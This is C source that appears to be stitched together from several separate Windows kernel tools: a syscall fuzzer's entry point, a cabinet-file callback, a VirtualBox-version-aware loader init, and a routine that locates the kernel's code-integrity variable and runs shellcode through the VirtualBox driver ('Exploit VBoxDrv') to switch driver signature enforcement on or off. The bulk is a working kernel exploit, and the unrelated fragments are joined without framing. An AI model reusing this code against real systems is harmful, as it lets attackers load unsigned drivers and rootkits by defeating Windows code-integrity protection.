/* * main * * Purpose: * * Program main, process command line options. * */ void main() { PVOID ExceptionHandler; CHAR szCmdLine[MAX_PATH + 1]; ExceptionHandler = RtlAddVectoredExceptionHandler(1, &VehHandler); if (ExceptionHandler) { RtlSecureZeroMemory(szCmdLine, sizeof(szCmdLine)); GetCommandLineParamA((LPCSTR)GetCommandLineA(), 1, (LPSTR)&szCmdLine, MAX_PATH, NULL); if (_strcmpi_a(szCmdLine, PARAM_WIN32K) == 0) { RtlSecureZeroMemory(szCmdLine, sizeof(szCmdLine)); GetCommandLineParamA((LPCSTR)GetCommandLineA(), 2, (LPSTR)&szCmdLine, MAX_PATH, NULL); #ifdef _DEBUG if (_strcmpi_a(szCmdLine, PARAM_LOG) == 0) g_Log = TRUE; #endif fuzz_win32k(); } else { #ifdef _DEBUG if (_strcmpi_a(szCmdLine, PARAM_LOG) == 0) g_Log = TRUE; #endif fuzz_ntos(); } RtlRemoveVectoredExceptionHandler(ExceptionHandler); } ExitProcess(0); }
INT_PTR DIAMONDAPI fdiNotify(FDINOTIFICATIONTYPE fdint, PFDINOTIFICATION pfdin) { INT_PTR Result = 0; CABDATA *Data, *ReturnData = NULL; LPSTR LookupFileName; LONG Size; switch (fdint) { case fdintCOPY_FILE: if (pfdin->pv == NULL) break; Data = (CABDATA *)pfdin->pv; LookupFileName = (LPSTR)&Data->Size; Size = pfdin->cb; if (_strcmpi_a(LookupFileName, pfdin->psz1) == 0) { ReturnData = LocalAlloc(LPTR, sizeof(CABDATA)); if (ReturnData) { ReturnData->Buffer = LocalAlloc(LPTR, pfdin->cb); if (ReturnData->Buffer == NULL) { LocalFree(ReturnData); ReturnData = NULL; } else { ReturnData->Offset = 0; ReturnData->Size = pfdin->cb; Data->Buffer = ReturnData->Buffer; Data->Size = ReturnData->Size; } return (INT_PTR)ReturnData; } } break; case fdintCLOSE_FILE_INFO: //release ReturnedInfo LocalFree((HLOCAL)pfdin->hf); Result = 1; break; default: break; } return Result; }
/* * ldrInit * * Purpose: * * Initialize loader global variables. * */ BOOL ldrInit( DWORD ldrCommand ) { BOOL bResult = FALSE, bFound = FALSE, cond = FALSE; DWORD dwSize; ULONG rl = 0, c; HKEY hKey = NULL; LRESULT lRet; LONG rel = 0; PVOID MappedKernel = NULL; ULONG_PTR KernelBase = 0L; SIZE_T ModuleSize; PLIST_ENTRY Head, Next; PLDR_DATA_TABLE_ENTRY Entry; PRTL_PROCESS_MODULES miSpace = NULL; CHAR KernelFullPathName[MAX_PATH * 2]; TCHAR szBuffer[MAX_PATH + 1]; do { lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), 0, KEY_READ, &hKey); // // If key not exists, return FALSE and loader will exit. // if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) { break; } // // If we are not in install mode - leave here. // if (ldrCommand != TSMI_INSTALL) { bResult = TRUE; break; } // // Select default patch table. // g_TsmiPatchDataValue = TsmiPatchDataValue; g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue); // // Read VBox version and select proper table. // RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); dwSize = MAX_PATH * sizeof(TCHAR); lRet = RegQueryValueEx(hKey, TEXT("Version"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize); if (lRet != ERROR_SUCCESS) { break; } if (_strcmpi(szBuffer, TEXT("4.3.16")) == 0) { g_TsmiPatchDataValue = &TsmiPatchDataValue_4316; g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4316); } if (_strcmpi(szBuffer, TEXT("4.3.18")) == 0) { g_TsmiPatchDataValue = &TsmiPatchDataValue_4318; g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4318); } if (_strcmpi(szBuffer, TEXT("4.3.20")) == 0) { g_TsmiPatchDataValue = &TsmiPatchDataValue_4320; g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4320); } if ( (_strcmpi(szBuffer, TEXT("4.3.22")) == 0) || (_strcmpi(szBuffer, TEXT("4.3.24")) == 0) ) { g_TsmiPatchDataValue = &TsmiPatchDataValue_4322_24; g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4322_24); } if (_strcmpi(szBuffer, TEXT("4.3.26")) == 0) { g_TsmiPatchDataValue = &TsmiPatchDataValue_4326; g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4326); } // // Enumerate loaded drivers. // miSpace = supGetSystemInfo(SystemModuleInformation); if (miSpace == NULL) { break; } if (miSpace->NumberOfModules == 0) { break; } // // Query system32 folder. // RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName)); rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH); if (rl == 0) { break; } KernelFullPathName[rl] = (CHAR)'\\'; // // For vista/7 find ntoskrnl.exe // bFound = FALSE; if (g_osv.dwMajorVersion == 6) { if (g_osv.dwMinorVersion < 2) { _strcpy_a(&KernelFullPathName[rl + 1], (const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]); KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; bFound = TRUE; } } // // For 8+, 10 find CI.DLL // if (bFound == FALSE) { _strcpy_a(&KernelFullPathName[rl + 1], CI_DLL); for (c = 0; c < miSpace->NumberOfModules; c++) if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName], CI_DLL) == 0) { KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase; break; } } HeapFree(GetProcessHeap(), 0, miSpace); miSpace = NULL; // // Map ntoskrnl/CI.DLL in our address space. // MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES); if (MappedKernel == NULL) { break; } if (g_osv.dwMajorVersion == 6) { // Find g_CiEnabled Vista, Seven if (g_osv.dwMinorVersion < 2) { // Query module size via PEB loader for bruteforce. ModuleSize = 0; EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock); Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList; Next = Head->Flink; while (Next != Head) { Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks); if (Entry->DllBase == MappedKernel) { ModuleSize = Entry->SizeOfImage; break; } Next = Next->Flink; } LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock); // Module not found, abort. if (ModuleSize == 0) { break; } rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize); } else { // Find g_CiOptions w8+ rel = dsfQueryCiOptions(&KernelBase, MappedKernel); } } else { // Otherwise > NT6.x, find g_CiOptions 10+ rel = dsfQueryCiOptions(&KernelBase, MappedKernel); } if (rel == 0) break; g_CiVariable = KernelBase; bResult = TRUE; } while (cond); if (hKey) { RegCloseKey(hKey); } if (miSpace != NULL) { HeapFree(GetProcessHeap(), 0, miSpace); } if (MappedKernel != NULL) { FreeLibrary(MappedKernel); } return bResult; }
BOOL DoWork( HANDLE hDevice, BOOL bDisable ) { BOOL bRes = FALSE, bFound, cond; ULONG rl = 0, c; LONG rel = 0; PVOID scBuffer = NULL, MappedKernel = NULL; ULONG_PTR KernelBase = 0L; SIZE_T ModuleSize; PLIST_ENTRY Head, Next; PLDR_DATA_TABLE_ENTRY Entry; PRTL_PROCESS_MODULES miSpace; CHAR KernelFullPathName[BUFFER_SIZE]; CHAR szOdsText[BUFFER_SIZE]; cond = FALSE; do { // // Enumerate loaded drivers. // miSpace = supGetSystemInfo(SystemModuleInformation); if (miSpace == NULL) { break; } if (miSpace->NumberOfModules == 0) { break; } RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName)); rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH); if (rl == 0) { break; } KernelFullPathName[rl] = (CHAR)'\\'; _strcpy_a(szOdsText, "[DF] Windows v"); ultostr_a(osv.dwMajorVersion, _strend_a(szOdsText)); _strcat_a(szOdsText, "."); ultostr_a(osv.dwMinorVersion, _strend_a(szOdsText)); OutputDebugStringA(szOdsText); // // For vista/7 find ntoskrnl.exe // bFound = FALSE; if (osv.dwMajorVersion == 6) { if (osv.dwMinorVersion < 2) { _strcpy_a(&KernelFullPathName[rl + 1], (const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]); KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; bFound = TRUE; } } // // For 8+, 10 find CI.DLL // if (bFound == FALSE) { _strcpy_a(&KernelFullPathName[rl + 1], CI_DLL); for (c = 0; c < miSpace->NumberOfModules; c++) if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName], CI_DLL) == 0) { KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase; break; } } HeapFree(GetProcessHeap(), 0, miSpace); miSpace = NULL; _strcpy_a(szOdsText, "[DF] Target module "); _strcat_a(szOdsText, KernelFullPathName); OutputDebugStringA(szOdsText); _strcpy_a(szOdsText, "[DF] Module base "); u64tohex_a(KernelBase, _strend_a(szOdsText)); OutputDebugStringA(szOdsText); // // Map ntoskrnl/CI.DLL in our address space. // MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES); if (MappedKernel == NULL) { break; } // // Check if we are in NT6.x branch // if (osv.dwMajorVersion == 6) { // // Find g_CiEnabled Vista, Seven // if (osv.dwMinorVersion < 2) { // // Query module size via PEB loader for bruteforce. // ModuleSize = 0; EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock); Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList; Next = Head->Flink; while (Next != Head) { Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks); if (Entry->DllBase == MappedKernel) { ModuleSize = Entry->SizeOfImage; break; } Next = Next->Flink; } LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock); // // Module not found, abort. // if (ModuleSize == 0) { break; } rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize); } else { // // Find g_CiOptions w8+ // rel = dsfQueryCiOptions(&KernelBase, MappedKernel); } } else { // // Otherwise > NT6.x, find g_CiOptions 10+ // rel = dsfQueryCiOptions(&KernelBase, MappedKernel); } if (rel == 0) break; _strcpy_a(szOdsText, "[DF] Apply patch to address "); u64tohex_a(KernelBase, _strend_a(szOdsText)); OutputDebugStringA(szOdsText); // // Select proper shellcode buffer // if (bDisable) { scBuffer = (PVOID)scDisable; } else { // //Shellcode for for 8/10+ // scBuffer = (PVOID)scEnable8Plus; if (osv.dwMajorVersion == 6) { // //Shellcode for vista, 7 // if (osv.dwMinorVersion < 2) { scBuffer = (PVOID)scEnableVista7; } } } // // Exploit VBoxDrv. // bRes = ControlDSE(hDevice, KernelBase, scBuffer); } while (cond); if (MappedKernel != NULL) { FreeLibrary(MappedKernel); } if (miSpace != NULL) { HeapFree(GetProcessHeap(), 0, miSpace); } return bRes; }